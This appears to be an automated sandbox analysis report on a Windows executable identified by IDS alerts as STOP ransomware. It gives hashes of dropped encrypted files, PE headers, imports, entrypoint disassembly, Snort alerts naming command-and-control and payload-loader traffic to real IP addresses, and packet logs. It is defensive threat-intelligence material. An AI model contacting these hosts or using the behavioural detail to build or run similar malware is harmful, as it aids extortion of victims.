                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG.,....0q...'."d.WU..3x.[Y....7!....$tw..hd..q......g4.*rX......*.7w...N.S..)=u.am~.a.e...A.z......p......[n..h.(...I}St.dcI.=..S.7!....Y..\..@Zu...v.h..Qx).....w...$G........O.D....D.j.]..F;x.=..i..T.d..{.8g.......'.7.c......lkP.E...Q87.N...p..)Sg77..I..`>....q/....*.......r.2...z...a.3.....u.....+....A.\......C.Al.C...\c4...m.HN..q..:Y..%..K.kE..o.92..+.B....GL..l>..]........z].Phg..`.v...o..gGir...uQ....N...m.Z.W..?.../.....H.~c,S...^'<>.9....<<.h...l...d2...\I..#.u.?..T.H.H.......U-E.....P.QyP.$...._x...d:..X.wH.5........5b..dO@4D......e.P^X..EI.O6.Z..o...p..6....&...>..9.N,2.........../..E.....B.P....CqK........c..s(C..&.....g....Q.\W.....X..^.......@. ...n..B.Y+N.&,..N..G:.,.f..X.8)...D....RGs..b(._..0._.r.w.j:>.............#%.U..i. ..m.=yv..YF].-.8q3.c..9.8;c..~WI.i........O.....@....x[..x..,#: W.:..=./D.Y^.w.l1O.X...n.....;.?.DA.....z&.h_....?k..L...uKS...u.U..d.3..%...s..R....P..........e!..yx...>...-.l.-,..<..Q.30...0e/-).k.0Y

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\{5F969F84-5F34-4AF8-8D36-D6D6A1668750}.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6130
                                                                                                                                                                      Entropy (8bit):7.969863558268538
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:dPQr04Lwxvg6A/Mx0hfoBk4jyS/fPg907RnGUB/gOReSLKACOwtzV4Tz128BYmSj:5QrL56A/C/jFXDxjLKesZQ28BYmSj
                                                                                                                                                                      MD5:698C2CB4A3CEFBAD88760EE524A44DA6
                                                                                                                                                                      SHA1:3F76BDEA44DC4C8DF0ACDB5FE8CC0584EC69BCBA
                                                                                                                                                                      SHA-256:1C81AD0998A791F5F21B93D609BE161469488A40FE91C9E79473210826E798F5
                                                                                                                                                                      SHA-512:ED03CE30939D07790E532FA549B78035840D1ABE3D27158AF17126C0CABB84B56F47B315E88B58EDDD3852BF67906FB01DE8E0724EBB51B3968E7D4CBDACE7EF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG........6!...3.@;8W....{.*..h.=.^.b{....![U..P.]..b;..g../9o$......).5.n5...U..N._...#.ken.....(.....'...P.?I..R.u,..d.`c...')..MM%.a.7.....xZ."...z+D...U..c........h-......./q.;.....L...7RK...t!....Ti$O......ke..$.......x.^:.D..S.T.H....Cs...zB.....u7...n........FW.*..=........~7....E.......]u/xB-$n(._.4W..K}...P8.A.(X.....W.E...oF4..p.,.5.V.X%..+.. }.a.Ya.~..]...).t...%s.*...H.^........UC.x;Q.N.S.9^..d.Oa..R..I....~.#(.RJ..jl..Y...F.h..l.3..@q.*..`.Wp....g.v~"1..p.(.....z...u.0!p...h.g...uY...q^-.fB..l2'z.%*.f.h._.~.$Q..l......X.1E......k.....l..K..V....]n.....1..j.,..U6.....+..,.CN..n1m.:..jS..!....p.r..o:T.:...R.Q......<;.."eb......e..Lw"./........(Z...h.vO..Y...-...].\..3.N\M.e..kxG.q...[..Q]...;.h,.?n.MT.#.5o.........`.......FS..&1.&...........B.F..L].;.4z.}.C.X..o.A...e.?"...I...........v.f..Z. ........+....HE,t.s7@..#0=-.. Yo.....C..TI.U.;L...k..b.5.......eM...^...;......O..|(..6...S|.z......UC2Uz.#......^...N..*9....=6..K

                                                                                                                                                                      C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1002}-.searchconnector-ms

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1193
                                                                                                                                                                      Entropy (8bit):7.8230145978908245
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:jkwFypVKlSPubSImS2agUujjoSuKJDGxB2pJUQrrIiMgyb4BH2bD:typkmubVmagUujjhgQPIiMsED
                                                                                                                                                                      MD5:C95A6816D4639FA4140B1A58FB6B463D
                                                                                                                                                                      SHA1:5FDCFB9A88E5D786E59EA2E547026B72E9E8FD98
                                                                                                                                                                      SHA-256:E38ED44AB2BDD8F27627A699DD23195C514B1B60E85A8A3984AEBE3950268950
                                                                                                                                                                      SHA-512:CF40B247E337BB2C19563451E37C648B9BB372AC5D7708D13BB3E517D1CD042E99AFBA983B4D56D3781CEE4FB0AC3801CE56E6C885E3463B3F8EDA5E5E615C31
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml'L.'#a...^......8..5P.K..M.P*..Z...w..I.d.ok...tY.%;.k.jz...z.i.}-P;..X.VK..,.]......?[....2.L.T./..'.$n]wdF...B.t;A......7..q...gT_.D.6.:.]uM/t...J.......]..S.K.KA.K.V..J.-...{..8N)..o..\.l.O....On..S.+J...>.C&y.l...%l.'.....!.&.B....Wy`7....?fe@....v.}..tbwbg2..3...} ..*.B....?Ug.....bU>.*........B.....6\'9..i"..w..4K.Y.jOt.0...8.....}.......y.......:|F-B.+."..{G3.....|...uw....X.5..%.@.C...Q/W....<.9.\..{*...O.\:12.H..A..L..H..6{..?..........$KO.b..[...].y .a.E..\..|..[...0@.....>..b..S..HRz..w.hl.....\CJ%3...;...3..=.q1..........I..,.$...8.u..A....zU.....;.O......e.S.70.0...R.^...8p.h.....j...&..&..1~?...1.5=p.(!b......V2..:AHj......4..C..Z|.........s..j..y..p....NYM..n.R.Ya......g. ,..ap.E.g..1... t.E+qcY..IS.>......u...GY.........?2..-.8.}p.?..V3..g..s....`\;.AxMj...J..r.Hf..^iY.J.H=..........@.a......A...N..4a......Z&$..B&.W...60y.+.....}..O.(;.5.....+.6aY.$e.._.&..e\.{..p...B..}%.f.=.....@jo:...Pd..F.P.#...R~.a ^f_s...d..[K/%..Oa.B.k.#K.

                                                                                                                                                                      C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1002}-.searchconnector-ms.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1193
                                                                                                                                                                      Entropy (8bit):7.8230145978908245
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:jkwFypVKlSPubSImS2agUujjoSuKJDGxB2pJUQrrIiMgyb4BH2bD:typkmubVmagUujjhgQPIiMsED
                                                                                                                                                                      MD5:C95A6816D4639FA4140B1A58FB6B463D
                                                                                                                                                                      SHA1:5FDCFB9A88E5D786E59EA2E547026B72E9E8FD98
                                                                                                                                                                      SHA-256:E38ED44AB2BDD8F27627A699DD23195C514B1B60E85A8A3984AEBE3950268950
                                                                                                                                                                      SHA-512:CF40B247E337BB2C19563451E37C648B9BB372AC5D7708D13BB3E517D1CD042E99AFBA983B4D56D3781CEE4FB0AC3801CE56E6C885E3463B3F8EDA5E5E615C31
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml'L.'#a...^......8..5P.K..M.P*..Z...w..I.d.ok...tY.%;.k.jz...z.i.}-P;..X.VK..,.]......?[....2.L.T./..'.$n]wdF...B.t;A......7..q...gT_.D.6.:.]uM/t...J.......]..S.K.KA.K.V..J.-...{..8N)..o..\.l.O....On..S.+J...>.C&y.l...%l.'.....!.&.B....Wy`7....?fe@....v.}..tbwbg2..3...} ..*.B....?Ug.....bU>.*........B.....6\'9..i"..w..4K.Y.jOt.0...8.....}.......y.......:|F-B.+."..{G3.....|...uw....X.5..%.@.C...Q/W....<.9.\..{*...O.\:12.H..A..L..H..6{..?..........$KO.b..[...].y .a.E..\..|..[...0@.....>..b..S..HRz..w.hl.....\CJ%3...;...3..=.q1..........I..,.$...8.u..A....zU.....;.O......e.S.70.0...R.^...8p.h.....j...&..&..1~?...1.5=p.(!b......V2..:AHj......4..C..Z|.........s..j..y..p....NYM..n.R.Ya......g. ,..ap.E.g..1... t.E+qcY..IS.>......u...GY.........?2..-.8.}p.?..V3..g..s....`\;.AxMj...J..r.Hf..^iY.J.H=..........@.a......A...N..4a......Z&$..B&.W...60y.+.....}..O.(;.5.....+.6aY.$e.._.&..e\.{..p...B..}%.f.=.....@jo:...Pd..F.P.#...R~.a ^f_s...d..[K/%..Oa.B.k.#K.

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Entropy (8bit):6.657605522788283
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                      File name:9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File size:1'150'976 bytes
                                                                                                                                                                      MD5:3eeb7b2030517f91fdf0f4c5278d8e76
                                                                                                                                                                      SHA1:c4c3a4650d278f2f8b9bf871c2ae91508ffae165
                                                                                                                                                                      SHA256:4ad7b8d228fe32d82b0373ce886f224f47c2e06a59d394c634160c70083b5f32
                                                                                                                                                                      SHA512:eaea7fa64c8bedf0698a12f16871c5a4caf19f4ce5576765d2d803568c8fe95ae4bef456c2c72f1591bda16fce412850889770a58a5e239e60a31633bfb7d110
                                                                                                                                                                      SSDEEP:24576:ZBUIKn/vwOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO8dWQHUq7:F0dwAYZt6C31WeTVRPOhd7Uq7
                                                                                                                                                                      TLSH:CB35AE02BB819171E5D341BA0DFE977E883AA9A0933A95C3D7E91C568E306D0673F3C5
                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(O..l...l...l.....7.f.......+/..*...h.....9.m...../.m...a|..Q...a|7.s...a|........&.n.....8.n.....#.M...l...........d...a|3.m..

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:90cececece8e8eb0

                                                                                                                                                                      Static PE Info

                                                                                                                                                                      General

                                                                                                                                                                      Entrypoint:0x424141
                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                      Time Stamp:0x5D890137 [Mon Sep 23 17:30:31 2019 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                      OS Version Minor:1
                                                                                                                                                                      File Version Major:5
                                                                                                                                                                      File Version Minor:1
                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                                                      Import Hash:0c756c849bc7b459f78f7a5ce46cd4a7

                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                      Instruction
                                                                                                                                                                      call 00007F96C11DAAA2h
                                                                                                                                                                      jmp 00007F96C11CC79Eh
                                                                                                                                                                      jmp 00007F96C11CCABCh
                                                                                                                                                                      push ebp
                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                      push dword ptr [ebp+18h]
                                                                                                                                                                      push dword ptr [ebp+14h]
                                                                                                                                                                      push dword ptr [ebp+10h]
                                                                                                                                                                      push dword ptr [ebp+0Ch]
                                                                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                                                                      call 00007F96C11CCAFBh
                                                                                                                                                                      int3
                                                                                                                                                                      push ebp
                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                      sub esp, 00000328h
                                                                                                                                                                      mov eax, dword ptr [0050AD20h]
                                                                                                                                                                      xor eax, ebp
                                                                                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                                                                                      cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                                                                                                                      push edi
                                                                                                                                                                      je 00007F96C11CC96Bh
                                                                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                                                                      call 00007F96C11DB244h
                                                                                                                                                                      pop ecx
                                                                                                                                                                      and dword ptr [ebp-00000320h], 00000000h
                                                                                                                                                                      lea eax, dword ptr [ebp-0000031Ch]
                                                                                                                                                                      push 0000004Ch
                                                                                                                                                                      push 00000000h
                                                                                                                                                                      push eax
                                                                                                                                                                      call 00007F96C11D3BE3h
                                                                                                                                                                      lea eax, dword ptr [ebp-00000320h]
                                                                                                                                                                      add esp, 0Ch
                                                                                                                                                                      mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                      lea eax, dword ptr [ebp-000002D0h]
                                                                                                                                                                      mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                      mov dword ptr [ebp-00000220h], eax
                                                                                                                                                                      mov dword ptr [ebp-00000224h], ecx
                                                                                                                                                                      mov dword ptr [ebp-00000228h], edx
                                                                                                                                                                      mov dword ptr [ebp-0000022Ch], ebx
                                                                                                                                                                      mov dword ptr [ebp-00000230h], esi
                                                                                                                                                                      mov dword ptr [ebp-00000234h], edi
                                                                                                                                                                      mov word ptr [ebp-00000208h], ss
                                                                                                                                                                      mov word ptr [ebp-00000214h], cs
                                                                                                                                                                      mov word ptr [ebp-00000238h], ds
                                                                                                                                                                      mov word ptr [ebp-0000023Ch], es
                                                                                                                                                                      mov word ptr [ebp-00000240h], fs
                                                                                                                                                                      mov word ptr [ebp+0000FDBCh], gs

                                                                                                                                                                      Rich Headers

                                                                                                                                                                      Programming Language:
                                                                                                                                                                      • [ASM] VS2013 UPD5 build 40629
                                                                                                                                                                      • [ C ] VS2013 UPD5 build 40629
                                                                                                                                                                      • [C++] VS2013 build 21005
                                                                                                                                                                      • [ASM] VS2013 build 21005
                                                                                                                                                                      • [ C ] VS2013 build 21005
                                                                                                                                                                      • [RES] VS2013 build 21005
                                                                                                                                                                      • [LNK] VS2013 UPD5 build 40629

                                                                                                                                                                      Data Directories

                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1085d00x154.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x12b0000x1e0.rsrc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x12c0000xa32c.reloc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xcc4600x38.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x105ac80x40.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xcc0000x3f0.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                      Sections

                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                      .text0x10000xca5bc0xca600False0.5030461029184682data6.570129941575212IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .rdata0xcc0000x3dba20x3dc00False0.3959071356275304data5.6730677387203405IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .data0x10a0000x203580x6400False0.4978125data4.939624310736174IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .rsrc0x12b0000x1e00x200False0.533203125data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .reloc0x12c0000xa32c0xa400False0.6199980945121951data6.612523450234696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                      Resources

                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                      RT_MANIFEST0x12b0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                      Imports

                                                                                                                                                                      DLLImport
                                                                                                                                                                      RPCRT4.dllRpcStringFreeW, UuidCreate, UuidToStringW, RpcStringFreeA, UuidToStringA
                                                                                                                                                                      MPR.dllWNetOpenEnumW, WNetEnumResourceW, WNetCloseEnum
                                                                                                                                                                      WININET.dllInternetCloseHandle, InternetReadFile, InternetOpenUrlW, InternetOpenW, HttpQueryInfoW, InternetOpenA, InternetOpenUrlA
                                                                                                                                                                      WINMM.dlltimeGetTime
                                                                                                                                                                      SHLWAPI.dllPathAppendA, PathFindFileNameW, PathRemoveFileSpecW, PathFileExistsA, PathFileExistsW, PathAppendW, PathFindExtensionW
                                                                                                                                                                      KERNEL32.dllVirtualFree, WriteFile, GetDriveTypeA, OpenProcess, GlobalAlloc, GetSystemDirectoryW, WideCharToMultiByte, LoadLibraryW, Sleep, CopyFileW, FormatMessageW, lstrcpynW, CreateProcessA, TerminateProcess, ReadFile, CreateFileW, lstrcatA, GetEnvironmentVariableA, lstrcmpW, MultiByteToWideChar, lstrlenW, FlushFileBuffers, GetShortPathNameA, GetFileSizeEx, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, MoveFileW, FindClose, Process32FirstW, LocalAlloc, CreateEventW, GetModuleFileNameA, Process32NextW, lstrcatW, CreateMutexA, FindNextFileW, CreateToolhelp32Snapshot, SetEnvironmentVariableA, DeleteFileW, LocalFree, lstrcpyW, DeleteFileA, lstrcpyA, SetPriorityClass, GetCurrentProcess, GetComputerNameW, GetLogicalDrives, GetModuleFileNameW, SetStdHandle, GetVersion, CreateDirectoryA, CreateThread, CompareStringW, GetTimeFormatW, GetDateFormatW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, CreateSemaphoreW, GetModuleHandleW, GetTickCount, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetModuleHandleA, GetVersionExA, GlobalMemoryStatus, LoadLibraryA, FlushConsoleInputBuffer, WaitForSingleObject, CreateDirectoryW, SetFilePointerEx, CreateProcessW, FreeLibrary, SetErrorMode, lstrlenA, SetFilePointer, FindFirstFileW, SetConsoleMode, CreateFileA, GetCommandLineW, GetNumberOfConsoleInputEvents, PeekConsoleInputA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetTimeZoneInformation, RaiseException, GetStringTypeW, GetConsoleCP, ReadConsoleW, GetConsoleMode, HeapSize, LoadLibraryExW, OutputDebugStringW, SetConsoleCtrlHandler, RtlUnwind, FatalAppExitA, GetStartupInfoW, GetExitCodeProcess, LCMapStringW, DeleteCriticalSection, AreFileApisANSI, ExitProcess, GetProcessHeap, HeapReAlloc, GlobalFree, SetEndOfFile, ReadConsoleInputA, CloseHandle, HeapFree, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, GetModuleHandleExW, WriteConsoleW, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCurrentThread, GetCurrentThreadId
                                                                                                                                                                      USER32.dllPeekMessageW, PostThreadMessageW, DefWindowProcW, DispatchMessageW, UpdateWindow, CreateWindowExW, LoadCursorW, IsWindow, ShowWindow, RegisterClassExW, PostQuitMessage, GetMessageW, DestroyWindow, SendMessageW, GetProcessWindowStation, GetUserObjectInformationW, MessageBoxA, GetDesktopWindow, MessageBoxW, TranslateMessage
                                                                                                                                                                      ADVAPI32.dllRegCloseKey, CloseServiceHandle, GetUserNameW, ReportEventA, RegisterEventSourceA, DeregisterEventSource, CryptHashData, RegSetValueExW, CryptDestroyHash, ControlService, RegOpenKeyExW, CryptCreateHash, CryptEncrypt, CryptImportKey, QueryServiceStatus, RegQueryValueExW, CryptReleaseContext, OpenServiceW, OpenSCManagerW, CryptAcquireContextW, CryptGetHashParam
                                                                                                                                                                      SHELL32.dllSHGetPathFromIDListW, SHGetSpecialFolderLocation, ShellExecuteA, ShellExecuteExW, CommandLineToArgvW, SHGetFolderPathA
                                                                                                                                                                      ole32.dllCoInitialize, CoInitializeSecurity, CoUninitialize, CoCreateInstance
                                                                                                                                                                      OLEAUT32.dllSysFreeString, VariantInit, VariantClear, GetErrorInfo, CreateErrorInfo, SetErrorInfo, VariantChangeType, SysAllocString
                                                                                                                                                                      IPHLPAPI.DLLGetAdaptersInfo
                                                                                                                                                                      WS2_32.dllinet_ntoa, inet_addr, gethostbyname
                                                                                                                                                                      DNSAPI.dllDnsFree, DnsQuery_W
                                                                                                                                                                      CRYPT32.dllCryptStringToBinaryA
                                                                                                                                                                      GDI32.dllDeleteObject, GetObjectA, SelectObject, GetDeviceCaps, GetBitmapBits, BitBlt, DeleteDC, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap

                                                                                                                                                                      Possible Origin

                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                      192.168.2.4175.120.254.949732802833438 01/12/24-06:48:00.971760TCP2833438ETPRO TROJAN STOP Ransomware CnC Activity4973280192.168.2.4175.120.254.9
                                                                                                                                                                      192.168.2.4175.120.254.949740802833438 01/12/24-06:48:06.593430TCP2833438ETPRO TROJAN STOP Ransomware CnC Activity4974080192.168.2.4175.120.254.9
                                                                                                                                                                      192.168.2.4175.120.254.949746802833438 01/12/24-06:48:12.962877TCP2833438ETPRO TROJAN STOP Ransomware CnC Activity4974680192.168.2.4175.120.254.9
                                                                                                                                                                      192.168.2.4186.147.159.14949734802020826 01/12/24-06:48:01.179520TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4973480192.168.2.4186.147.159.149
                                                                                                                                                                      192.168.2.4186.147.159.14949734802036333 01/12/24-06:48:01.179520TCP2036333ET TROJAN Win32/Vodkagats Loader Requesting Payload4973480192.168.2.4186.147.159.149
                                                                                                                                                                      192.168.2.4175.120.254.949735802020826 01/12/24-06:48:04.269814TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4973580192.168.2.4175.120.254.9
                                                                                                                                                                      192.168.2.4175.120.254.949735802036333 01/12/24-06:48:04.269814TCP2036333ET TROJAN Win32/Vodkagats Loader Requesting Payload4973580192.168.2.4175.120.254.9

                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                      TCP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Jan 12, 2024 06:47:54.617425919 CET49729443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:54.617474079 CET44349729172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:54.617567062 CET49729443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:54.634196997 CET49729443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:54.634213924 CET44349729172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:54.853051901 CET44349729172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:54.853305101 CET49729443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:55.002407074 CET49729443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:55.002449989 CET44349729172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:55.003547907 CET44349729172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:55.003830910 CET49729443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:55.009556055 CET49729443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:55.049974918 CET44349729172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:55.366385937 CET44349729172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:55.366630077 CET44349729172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:55.366957903 CET49729443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:55.366959095 CET49729443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:55.370547056 CET49729443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:55.370578051 CET44349729172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:56.586592913 CET49730443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:56.586683989 CET44349730172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:56.586988926 CET49730443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:56.597270012 CET49730443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:56.597338915 CET44349730172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:56.804887056 CET44349730172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:56.805082083 CET49730443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:56.812134027 CET49730443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:56.812186003 CET44349730172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:56.812740088 CET44349730172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:56.812822104 CET49730443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:56.815921068 CET49730443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:56.817848921 CET49731443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:56.817954063 CET44349731172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:56.818049908 CET49731443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:56.829564095 CET49731443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:56.829613924 CET44349731172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:56.861903906 CET44349730172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:57.051336050 CET44349731172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:57.051460028 CET49731443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:57.062517881 CET49731443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:57.062549114 CET44349731172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:57.063581944 CET44349731172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:57.063673973 CET49731443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:57.069235086 CET49731443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:57.109944105 CET44349731172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:57.309850931 CET44349730172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:57.310023069 CET49730443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:57.310082912 CET44349730172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:57.310117960 CET44349730172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:57.310164928 CET49730443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:57.310193062 CET49730443192.168.2.4172.67.139.220
